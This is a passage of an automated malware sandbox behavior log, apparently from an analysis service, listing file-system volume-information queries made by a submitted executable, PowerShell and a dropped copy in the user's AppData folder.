                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
